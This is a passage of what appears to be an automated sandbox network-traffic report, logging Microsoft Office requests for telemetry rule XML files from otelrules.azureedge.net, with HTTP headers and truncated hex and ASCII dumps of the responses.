                                                                                2024-10-04 09:34:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                106192.168.2.55554013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:10 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1427
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE56F6873"
                                                                                x-ms-request-id: dc68e902-201e-006e-0d8c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55ncqdn59ub6rndq00000000bxg00000000a1cb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                107192.168.2.55553713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:10 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                x-ms-request-id: 0da95f5c-701e-0097-318c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55n4msds84xh4z67w000000061g000000004b19
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                108192.168.2.55553913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:10 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                x-ms-request-id: 8be9c1e7-301e-0052-678c-1565d6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55gq5fmm10nm5qqr80000000cdg000000006pz9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                109192.168.2.55553813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:10 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                x-ms-request-id: 704395e8-201e-005d-718c-15afb3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55jdxmppy6cmd24bn00000004p0000000001hn1
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                110192.168.2.55554113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:10 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1390
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                ETag: "0x8DC582BE3002601"
                                                                                x-ms-request-id: 21dfe39b-001e-0049-468c-155bd5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55rg5b7sh1vuv8t7n0000000ckg000000009vu0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                111192.168.2.55554713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:11 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1401
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                x-ms-request-id: 82f8cc24-c01e-0014-3a8c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc552g4w83buhsr3htc0000000ceg000000000swx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                112192.168.2.55555013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:11 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1391
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                x-ms-request-id: 023e591f-a01e-003d-618c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55gq5fmm10nm5qqr80000000chg000000001893
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                113192.168.2.55555113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:11 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1354
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                x-ms-request-id: 76253f94-c01e-0066-328c-15a1ec000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55rv8zjq9dg0musxg0000000c7g00000000a2mg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                114192.168.2.55555213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:11 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                x-ms-request-id: 819d4321-f01e-0020-6e8c-15956b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55jdxmppy6cmd24bn00000004gg0000000078sk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                115192.168.2.55554813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:11 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1364
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                x-ms-request-id: ba3c7a68-301e-0099-698c-156683000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc554w2fgapsyvy8ua00000000bs000000000ab9k
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
